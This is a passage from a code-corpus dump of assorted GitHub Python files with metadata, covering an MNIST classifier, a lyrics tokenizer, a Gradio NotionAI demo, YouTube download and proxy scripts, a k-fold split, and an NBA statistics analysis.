pd.to_numeric(df[col].astype(str).str.replace(r'\\D', '') , errors='coerce')\n#print(df)\n#print( 100 * df.isnull().sum() / len(df))\n#print(df.dtypes)\n#print(df.iloc[errors,:])\n\n'''\n\n\n\n\n\n\n\n\n\n\n\n'''\ndf = (pd.read_csv(filepath_or_buffer=os.path.join(data_path, 'master.csv'))\n .rename(columns={'suicides/100k pop' : 'suicides_per_100k',\n ' gdp_for_year ($) ' : 'gdp_year', \n 'gdp_per_capita ($)' : 'gdp_capita',\n 'country-year' : 'country_year'})\n .assign(gdp_year=lambda _df: _df['gdp_year'].str.replace(',','').astype(np.int64))\n )\n'''", "repo_name": "obaydakov-zz/acetl", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 13464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.set_option", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.read_csv", 
"line_number": 27, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.number", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 64, "usage_type": "call"}, {"api_name": "scipy.stats.zscore", "line_number": 64, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 64, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 79, "usage_type": "call"}, {"api_name": "ProblemFinder.ProblemFinder", "line_number": 80, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 197, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 202, "usage_type": "attribute"}]} +{"seq_id": "475684328", "text": "import tensorflow as tf\nimport os\nfrom matplotlib import pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport numpy as np\nimport random\nfrom sklearn.metrics import accuracy_score\nimport pandas as pd \n\nmnist = tf.keras.datasets.mnist\n(x_train, y_train),(x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0 #normalization of pixels \nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(512, activation=tf.nn.relu), #changed to relu,sigmoid,tanh\n tf.keras.layers.Dropout(0.2), #to prevent overfitting\n tf.keras.layers.Dense(10, activation=tf.nn.softmax) #output layer\n])\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\nlog = model.fit(x_train, y_train, epochs=5)\nmodel.evaluate(x_test, y_test)\n# plotting the metrics of the model\nfig = plt.figure()\nplt.subplot(2,1,1)\nplt.plot(log.history['acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.subplot(2,1,2)\nplt.plot(log.history['loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.tight_layout()\nfig\n\npreds_1 = model.predict(x_test) #predict the output values\nnew_1 = np.zeros((len(preds_1)))\nfor i in range(len(preds_1)):\n new_1[i]=np.argmax(preds_1[i]) # take the element with max probability value in each row and store it in a new array\n#predicted_value = pd.DataFrame(new_1)\n#predicted_value.to_csv(r\"C:\\Users\\aditya vikram\\Desktop\\nn_predvalues_mnist.csv\")\nacc_1 = accuracy_score(y_test,new_1)\nprint(\"accuracy MNIST dataset:\",acc_1)\nfrom sklearn.metrics import confusion_matrix\nb = confusion_matrix(y_test,new_1)\nprint(b)\n\nfrom PIL import Image\nUSPSMat = []\nUSPSTar = []\ncurPath = r'C:\\Users\\aditya vikram\\Desktop\\ML_project3\\USPSdata\\USPSdata\\Numerals'\nsavedImg = []\nfor j in range(0,10):\n curFolderPath = curPath + '/' + str(j)\n imgs = os.listdir(curFolderPath)\n for img in imgs:\n curImg = curFolderPath + '/' + img\n if curImg[-3:] == 'png':\n img = Image.open(curImg,'r')\n img = img.resize((28, 28))\n savedImg = img\n imgdata = (255-np.array(img.getdata()))/255\n USPSMat.append(imgdata)\n USPSTar.append(j)\narr_mat = np.asarray(USPSMat)\n#print(arr_mat.shape)\nmatrixvalues = np.reshape(arr_mat,(19999,28,28))\n#matrixvalues.shape\n\nscore = model.evaluate(matrixvalues, USPSTar)\n\npreds = model.predict(matrixvalues)\n\nnew = np.zeros((len(preds)))\nfor i in range(len(preds)):\n new[i]=np.argmax(preds[i]) \n#predicted_value = pd.DataFrame(new)\n#predicted_value.to_csv(r\"C:\\Users\\aditya vikram\\Desktop\\nn_predvalues_usps.csv\")\n\n\nusps_tar = np.asarray(USPSTar)\n\n\nacc = 
accuracy_score(usps_tar, new)\nprint(\"accuracy USPS dataset:\",acc) #accuracy usps data\nfrom sklearn.metrics import confusion_matrix\na = confusion_matrix(usps_tar,new)\nprint(a)\n\n", "repo_name": "aditya-vikram-parakala/MachineLearning_CSE574", "sub_path": "neural_dnn.py", "file_name": "neural_dnn.py", "file_ext": "py", "file_size_in_byte": 2948, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "tensorflow.keras", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 17, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 40, "usage_type": "call"}, {"api_name": 
"numpy.argmax", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 48, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 58, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 62, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "71254674364", "text": "import pandas as pd\nimport re\nimport markovify\nfrom nltk import word_tokenize, download\ndownload('punkt')\n\n\ndef format_lyrics(lyric):\n lyric = re.sub('\\r\\n\\r\\n', ' xxsectionxx ', lyric) # delimit verses\n lyric = re.sub('\\r\\n', ' xxlinexx ', lyric) # delimit lines\n lyric = re.sub('\\[[()&a-zA-Z0-9 :.-]+\\]', '', lyric) # remove notes in []\n # need to only remove individual [] sets, not things between two notes\n lyric = lyric.lower()\n lyric = re.sub(\"'\", '', lyric)\n lyric = re.sub(\"\\x92\", '', lyric)\n lyric = word_tokenize(lyric)\n return lyric\n\nif __name__=='__main__':\n song_data = pd.read_csv('rapper/data/songs_and_lyrics.csv', encoding = \"ISO-8859-1\")\n song_data['lyrics'] = [format_lyrics(lyric) for lyric in song_data['lyrics']]\n", "repo_name": "KSafran/b_rabbit_ai", "sub_path": "rapper/format_lyrics.py", "file_name": "format_lyrics.py", "file_ext": "py", "file_size_in_byte": 769, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "nltk.download", "line_number": 5, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 9, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 10, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 11, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 14, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 15, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "1986272658", "text": "#!/usr/bin/env python3\n# -*- coding : utf-8 -*-\n# author:samge\n# data:2023-03-28 14:40\n# describe:\nimport gradio as gr\n\nfrom gradio_ui.g_utils.common import u_common_layout\nfrom gradio_ui.tabs.notion_demo import u_handler_notion_demo\nfrom utils.u_config import g_config\n\n\ndef create_layout():\n \"\"\" 构建布局 \"\"\"\n with gr.Row().style(equal_height=True):\n with gr.Column(scale=1):\n api_url = gr.Textbox(show_label=True, label=\"代理Url\", placeholder=\"请输入自定义的代理请求地址(如果是部署在国外服务器,可空)\", lines=1, max_lines=1, value=g_config.api_url)\n with gr.Row().style(equal_height=True):\n notion_token = gr.Textbox(show_label=True, label=\"Notion_token_v2\", placeholder=\"请输入Notion的token_v2值\", lines=1, max_lines=1, value=g_config.notion_token)\n space_id = gr.Textbox(show_label=True, label=\"space_id\", 
placeholder=\"请输入Notion的space_id值\", lines=1, max_lines=1, value=g_config.space_id)\n with gr.Row().style(equal_height=True):\n topic = u_common_layout.get_topic_layout()\n prompt_type = u_common_layout.get_prompt_type_layout()\n with gr.Row().style(equal_height=True):\n tone = u_common_layout.get_tone_layout()\n translate = u_common_layout.get_translate_layout()\n prompt = gr.Textbox(show_label=True, label=\"提示内容(prompt)\", placeholder=\"请输入提示内容(prompt),与topic强相关\", lines=3, max_lines=3)\n context = gr.Textbox(show_label=True, label=\"上下文内容(context)\", placeholder=\"请输入上下文内容(context),与prompt_type、tone、translate强相关,与topic非相关\", lines=6, max_lines=6)\n with gr.Row().style(equal_height=True):\n button_load = gr.Button(\"加载缓存\")\n button = gr.Button(\"生成内容\")\n with gr.Column(scale=1):\n result = gr.Textbox(\n label=\"生成结果\",\n placeholder=\"这里展示生成结果\",\n lines=20,\n max_lines=20\n )\n result_api_info = gr.Textbox(\n label=\"API请求参考\",\n placeholder=\"这里展示API请求的参考信息\",\n lines=10,\n max_lines=10\n )\n button.click(u_handler_notion_demo.handler, inputs=[topic, prompt_type, tone, translate, prompt, context, notion_token, space_id, api_url], outputs=[result, result_api_info])\n button_load.click(u_handler_notion_demo.load, inputs=[], outputs=[topic, prompt_type, tone, translate, prompt, context, notion_token, space_id, api_url])\n", "repo_name": "Samge0/notionai-api-py", "sub_path": "gradio_ui/tabs/notion_demo/u_layout_notion_demo.py", "file_name": "u_layout_notion_demo.py", "file_ext": "py", "file_size_in_byte": 2721, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "gradio.Row", "line_number": 15, "usage_type": "call"}, {"api_name": "gradio.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.u_config.g_config.api_url", "line_number": 17, "usage_type": "attribute"}, {"api_name": "utils.u_config.g_config", "line_number": 17, "usage_type": "name"}, {"api_name": "gradio.Row", "line_number": 18, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.u_config.g_config.notion_token", "line_number": 19, "usage_type": "attribute"}, {"api_name": "utils.u_config.g_config", "line_number": 19, "usage_type": "name"}, {"api_name": "gradio.Textbox", "line_number": 20, "usage_type": "call"}, {"api_name": "utils.u_config.g_config.space_id", "line_number": 20, "usage_type": "attribute"}, {"api_name": "utils.u_config.g_config", "line_number": 20, "usage_type": "name"}, {"api_name": "gradio.Row", "line_number": 21, "usage_type": "call"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout.get_topic_layout", "line_number": 22, "usage_type": "call"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout", "line_number": 22, "usage_type": "name"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout.get_prompt_type_layout", "line_number": 23, "usage_type": "call"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout", "line_number": 23, "usage_type": "name"}, {"api_name": "gradio.Row", "line_number": 24, "usage_type": "call"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout.get_tone_layout", "line_number": 25, "usage_type": "call"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout", "line_number": 25, "usage_type": "name"}, {"api_name": "gradio_ui.g_utils.common.u_common_layout.get_translate_layout", "line_number": 26, "usage_type": "call"}, {"api_name": 
"gradio_ui.g_utils.common.u_common_layout", "line_number": 26, "usage_type": "name"}, {"api_name": "gradio.Textbox", "line_number": 27, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 28, "usage_type": "call"}, {"api_name": "gradio.Row", "line_number": 29, "usage_type": "call"}, {"api_name": "gradio.Button", "line_number": 30, "usage_type": "call"}, {"api_name": "gradio.Button", "line_number": 31, "usage_type": "call"}, {"api_name": "gradio.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 33, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 39, "usage_type": "call"}, {"api_name": "gradio_ui.tabs.notion_demo.u_handler_notion_demo.handler", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gradio_ui.tabs.notion_demo.u_handler_notion_demo", "line_number": 45, "usage_type": "name"}, {"api_name": "gradio_ui.tabs.notion_demo.u_handler_notion_demo.load", "line_number": 46, "usage_type": "attribute"}, {"api_name": "gradio_ui.tabs.notion_demo.u_handler_notion_demo", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "4559171575", "text": "#!/usr/bin/env python\n\n\"\"\"\nSimple Youtube streaming proxy\n\nUsage:\n\n1. Run `pip install flask`,\n2. Install youtube-dl (try: `sudo apt-get install youtube-dl`),\n3. Run `python ytproxy.py`,\n4. Point your browser to http://localhost:5000\n\"\"\"\n\nfrom flask import Flask, Response, request, stream_with_context\nimport subprocess\napp = Flask(__name__)\n\n\n@app.route(\"/ytdl\")\ndef hello():\n\n def streamGenerator():\n p = subprocess.Popen(['youtube-dl', request.args['url'], '-o', '-'],\n stdout=subprocess.PIPE)\n while True:\n y = p.stdout.read(1024)\n if y != '':\n yield y\n\n resp = stream_with_context(streamGenerator())\n return Response(resp, mimetype='video/webm')\n\n\n@app.route(\"/\")\ndef index():\n return 'Enter YT URL:
'\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "d33tah/ytproxy.py", "sub_path": "ytproxy.py", "file_name": "ytproxy.py", "file_ext": "py", "file_size_in_byte": 878, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "subprocess.PIPE", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.stream_with_context", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "21191584323", "text": "from pytube import YouTube\nfrom colorama import init, Fore\n\n\ndef on_complete(stream, filepath):\n print('download complete')\n print(filepath)\n\ndef on_progress(stream, chunk, bytes_remaining ):\n progress_str = f'{round( 100 - (bytes_remaining / stream.filesize * 100),2)}%'\n print(progress_str)\n\ninit()\n#link = input('Youtube link: ')\nlink = 'https://www.youtube.com/watch?v=3_CpaZfn-mI'\nvideo_obj = YouTube(link, on_complete_callback = on_complete, on_progress_callback = on_progress)\n\n# video information\nprint(Fore.RED + f'title: \\033[39m {video_obj.title}')\nprint(Fore.RED + f'length: \\033[39m {(video_obj.length / 60.2)} minutes ')\nprint(Fore.RED + f'views: \\033[39m {(video_obj.views / 1000000)} milion' )\nprint(Fore.RED + f'author: \\033[39m n {video_obj.author}')\n\n# download\n\nprint(Fore.RED + 'download:' +\n Fore.GREEN + '(b)est \\033[39m| ' +\n Fore.YELLOW + '(w)orst \\033[39m| ' +\n Fore.BLUE + '(a)udio \\033[39m| (e)xit')\n \ndownload_choice = input('Choice: ')\n#\n#match download_choice:\n# case 'b':\n# video_obj.streams.get_highest_resolution().download(r'\\home\\egmj\\Projects\\youtube-download')\n# case 'w':\n# video_obj.streams.get_worst_resolution().download(r'\\home\\egmj\\Projects\\youtube-download')\n# case 'a':\n# video_obj.streams.get_audio_only().download(r'\\home\\egmj\\Projects\\youtube-download')\n#\nif download_choice == 'b':\n video_obj.streams.get_highest_resolution().download(r'/home/egmj/Projects/youtube-download')\nelif download_choice == 'w':\n video_obj.streams.get_lowest_resolution().download(r'/home/egmj/Projects/youtube-download')\nelif download_choice == 'a':\n video_obj.streams.get_audio_only().download(r'/home/egmj/Projects/youtube-download')\nelif download_choice == 'e':\n quit()\n", "repo_name": "EGMJ/youtube-download", "sub_path": "demo.py", "file_name": "demo.py", "file_ext": "py", "file_size_in_byte": 1766, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "colorama.init", "line_number": 13, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 16, "usage_type": "call"}, {"api_name": "colorama.Fore.RED", "line_number": 19, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 19, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 20, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 20, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 21, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 21, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 22, 
"usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 22, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 26, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 26, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 27, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 27, "usage_type": "name"}, {"api_name": "colorama.Fore.YELLOW", "line_number": 28, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 28, "usage_type": "name"}, {"api_name": "colorama.Fore.BLUE", "line_number": 29, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "73753346363", "text": "import argparse\n\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom src.utils.random_seed import SEED\n\nSAVE_DIR = './lists/folds/'\nDATA_PATH = './data/train.csv'\nNUM_FOLDS = 5\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--num_folds', default=NUM_FOLDS)\n parser.add_argument('--seed', default=SEED)\n\n args = parser.parse_args()\n\n num_folds = int(args.num_folds)\n seed = int(args.seed)\n\n df = pd.read_csv(DATA_PATH)\n kf = StratifiedKFold(num_folds, shuffle=True, random_state=seed)\n\n for fold, (train_idx, val_idx) in enumerate(kf.split(df, df.label.values)):\n df.loc[train_idx, :].to_csv(f'{SAVE_DIR}train/train_{fold}.csv', index=False)\n df.loc[val_idx, :].to_csv(f'{SAVE_DIR}val/val_{fold}.csv', index=False)\n", "repo_name": "iamnmt/digit-recognizer", "sub_path": "lists/split_kfold.py", "file_name": "split_kfold.py", "file_ext": "py", "file_size_in_byte": 820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "src.utils.random_seed.SEED", "line_number": 15, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "28658717583", "text": "\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, StandardScaler\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.model_selection import train_test_split\n\nimport category_encoders as ce\noneHotEncoder = ce.OneHotEncoder(cols=[0,1,2])\n\nnp.random.seed(42)\n\nENCODERS_FIT = False\n\nAGE_LIMIT = 2008\n\n\n\ndef evaluate_predictions(y_pred, y_real, buffer):\n \n correct_count = 0\n n = len(y_pred)\n \n for i in range(n):\n \n pred = y_pred[i]\n real = y_real[i]\n \n if real - buffer <= pred and pred <= real + buffer:\n correct_count += 1\n \n return correct_count / n\n \n\ndef get_advanced_stats():\n \n # 2001 -> 2000-2001 season \n \n advanced_stats_by_year = {}\n\n for year2 in range(1995,2020):\n \n year1 = year2 - 1\n \n file_name = \"data/nba_advanced_stats/\"\n file_name += \"nba_advanced_\" + str(year1) + \"_\" + str(year2) + \".csv\"\n \n statsDF = pd.read_csv(file_name)\n \n advanced_stats_by_year[year2] = statsDF\n\n return advanced_stats_by_year\n\ndef get_max_future_stat(stat_name, cur_player, draft_year, advanced_stats_by_year, position, position_filter=None):\n \n # check season and season +- 1, eg 6, then 5, then 7 if 
need be, else return nil.\n # must be between 2001 and 2019\n \n \n if draft_year > 2016 or draft_year < AGE_LIMIT:\n return None\n \n if position_filter and position != position_filter:\n return None\n \n player_stats = []\n \n valid_years = advanced_stats_by_year.keys()\n talent_development_buffer = 0 # years\n \n for year in range(draft_year + talent_development_buffer, max(valid_years) + 1):\n \n # if year available\n if year in valid_years:\n \n season_stats = advanced_stats_by_year[year]\n playerList = list(season_stats.Player)\n \n # if player played in that year\n if cur_player in playerList:\n \n player_index = playerList.index(cur_player)\n games_played_in_season = season_stats.at[player_index, \"G\"]\n \n # if player played substantial number of games that year\n if games_played_in_season > 25:\n stat_to_return = season_stats.at[player_index, stat_name]\n \n player_stats.append(stat_to_return)\n \n if len(player_stats) <= 0:\n return None\n \n return max(player_stats)\n\n\ndef get_y(data, stat_name, position_filter=None):\n \n \n y = []\n dropped_player_indeces = []\n \n advanced_stats_by_year = get_advanced_stats()\n \n players = list(data.playerName)\n final_college_seasons = list(data.Season)\n positions = list(data.position)\n \n for i in range(len(players)): #len(players)\n \n cur_player = players[i]\n draft_year = int(final_college_seasons[i][0:4]) + 1\n position = positions[i]\n \n \n stat_to_predict = get_max_future_stat(stat_name,\n cur_player,\n draft_year,\n advanced_stats_by_year,\n position,\n position_filter)\n \n if stat_to_predict:\n y.append(stat_to_predict)\n else: \n dropped_player_indeces.append((i, cur_player, draft_year))\n\n \n return (y, dropped_player_indeces)\n\n\n\n# preproess feature set X \ndef preprocess_input(X):\n\n global ENCODERS_FIT\n global oneHotEncoder\n # drop unwanted features\n \n unwanted_columns = [\"playerName\", \"Season\", \"spacer1\", \"transferredSchools\", \"ORB\", \"DRB\"] # \"\\xa0\"\n X = X.drop(unwanted_columns, axis=1)\n\n \n # organize features\n columns = list(X.columns)\n categorical = [\"position\", \"School\", \"Conf\"]\n #diff = lambda l1, l2: [x for x in l1 if x not in l2]\n #numerical = diff(columns, categorical) \n \n \n # cast numerical data as floats\n for col in columns:\n if col not in categorical:\n X[col] = X[col].astype(float)\n \n \n # impute: fill in missing values\n from sklearn.impute import SimpleImputer\n imputer = SimpleImputer(missing_values=np.nan, strategy=\"mean\")\n X = X.values # convert to ndarray of objects \n imputer = imputer.fit(X[:, 3:])\n X[:, 3:] = imputer.transform(X[:, 3:])\n \n \n # scale data #\n X_scaler = StandardScaler()\n X_scaler = X_scaler.fit(X[:, 3:])\n X[:, 3:] = X_scaler.transform(X[:, 3:])\n\n \n \n # encode categorial data #\n \n if not ENCODERS_FIT:\n oneHotEncoder = oneHotEncoder.fit(X)\n X = oneHotEncoder.transform(X)\n ENCODERS_FIT=True\n else:\n X = oneHotEncoder.transform(X)\n \n\n return X\n \n \ndef get_nba_player_names(year_start, year_end):\n\n player_list = []\n \n for yr1 in range(year_start, year_end):\n \n yr2 = yr1 + 1\n file_name = \"data/nba_advanced_stats/\"\n file_name += \"nba_advanced_\" + str(yr1) + \"_\" + str(yr2) + \".csv\"\n \n print(file_name)\n data = pd.read_csv(file_name)\n \n cur_players = list(data.Player)\n \n player_list.extend(cur_players)\n \n player_list = list(set(player_list))\n \n return player_list\n\n\n\n\n\nnba_player_names = get_nba_player_names(2009, 2019)\n\n\n\n\n# Importing the dataset\ndata = 
pd.read_csv(\"data/college_stats/final_CBB_data.csv\")\n\ncollege_data = data.copy()\n\n# get y\nfuture_stats, dropped_player_indeces = get_y(data, \"WS\")\n\n\n# drop players from X if they didnt qualify for y\nfor index, player, year in dropped_player_indeces:\n print(\"dropping \", player)\n college_data = college_data.drop([index], axis=0)\n \n \n\ncollege_stat_type = \"TRB\"\n \ncollege_stat = college_data[college_stat_type]\n \n \n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n\n\nax = sns.scatterplot(x=college_data[college_stat_type], y=future_stats)\nax.set(xlabel=\"college \" + college_stat_type , ylabel='NBA WS')\n\n\n\n\n\n\n\n# Draw a nested barplot to show survival for class and sex\ng = sns.catplot(x=\"college AST\", y=\"pred\", hue=\"player\", data=graphData,\n height=6, kind=\"bar\", palette=\"muted\")\ng.despine(left=True)\ng.set_ylabels(\"Win Shares\")\n \nsns.set(style=\"whitegrid\")\n\n \n \n \n \n \n##################### get correlation ############################\n \nfrom scipy.stats import pearsonr\n\ncolumns = list(college_data.columns)\ndiff = lambda l1, l2: [x for x in l1 if x not in l2]\ncolumns = diff(columns, [\"spacer1\", \"playerName\", \"Season\", \"School\", \"Conf\", \"position\"])\n\n\nfrom sklearn.impute import SimpleImputer\n\n\n\ncorrs = []\nps = []\nfor coll_stat in columns:\n print(coll_stat)\n stat = np.array(college_data[coll_stat])\n \n imputer = SimpleImputer(missing_values=np.nan, strategy=\"mean\")\n\n\n imputer = imputer.fit(stat.reshape(-1, 1))\n stat = imputer.transform(stat.reshape(-1, 1))\n stat = stat.reshape(1228)\n \n print(stat)\n correlation = pearsonr(stat, future_stats)\n\n\n corrs.append(correlation[0])\n ps.append(correlation[1])\n \n \n \npredDF = pd.DataFrame()\npredDF[\"college stat name\"] = columns\npredDF[\"correlation\"] = corrs\npredDF[\"ps\"] = ps\n\npredDF = predDF.sort_values(by=\"correlation\", ascending=False)\n \n##################### /get correlation ############################\n \n \n \n \n \n \n \n \n \n\n\n\n \ngraphData = pd.DataFrame()\n\ngraphData[\"college AST\"] = college_stat\ngraphData[\"NBA WS\"] = future_stats\n\n \n \nimport seaborn as sns\nsns.set(style=\"ticks\")\n\ndf = sns.load_dataset(\"iris\")\nsns.pairplot(df, hue=\"species\")\n \n \n\n \n \n \n \n \n \n \n \n \n ", "repo_name": "cademay/deepLearningNbaDraft", "sub_path": "finalProject/src/untitled1.py", "file_name": "untitled1.py", "file_ext": "py", "file_size_in_byte": 7986, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "category_encoders.OneHotEncoder", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 53, "usage_type": 